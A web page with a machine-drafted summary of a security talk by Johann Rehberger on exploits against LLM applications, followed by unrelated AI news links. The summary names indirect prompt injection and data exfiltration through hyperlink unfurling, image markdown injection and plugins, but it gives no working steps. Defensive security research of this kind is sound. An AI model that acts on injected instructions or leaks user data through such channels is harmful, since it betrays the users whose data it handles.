Real-world exploits and mitigations in Large Language Model applications
Date : 2023-12-29
Description
This summary was drafted with mixtral-8x7b-instruct-v0.1.Q5_K_M.gguf
In this talk, Johann Rehberger delves into the security risks associated with Large Language Model applications such as ChatGPT, Bing Chat, and Google Bard. He discusses three major threat categories, focusing on indirect prompt injections, where untrusted data is inserted into the chat context. Rehberger demonstrates this concept using examples and a Bing Chat demo. The presentation also explores strategies attackers use to trick LLMs and the dangers of the plugin ecosystem. Data exfiltration methods are discussed, including unfurling of hyperlinks, image markdown injection, and plugin-based data exfiltration. Rehberger emphasizes the importance of not blindly trusting LLM output and advocates for human oversight in LLM applications.
Read article here
Recently on :
Artificial Intelligence
Security | Surveillance | Privacy
PITTI - 2024-09-19
A bubble in AI?
Bubble or true technological revolution? While the path forward isn't without obstacles, the value being created by AI extends ...
PITTI - 2024-09-08
Artificial Intelligence : what everyone can agree on
Artificial Intelligence is a divisive subject that sparks numerous debates about both its potential and its limitations. Howeve...
WEB - 2024-03-04
Nvidia bans using translation layers for CUDA software | Tom's Hardware
Tom's Hardware - Nvidia has banned running CUDA-based software on other hardware platforms using translation layers in its lice...
WEB - 2024-02-21
Retell AI : conversational speech engine
Retell tackle the challenge of real time conversations with voice AI.
WEB - 2024-02-21
Groq Inference Tokenomics: Speed, But At What Cost? | Semianalysis
Semianalysis - Groq, an AI hardware startup, has been making waves with their impressive demos showcasing Mistral Mixtral 8x7b ...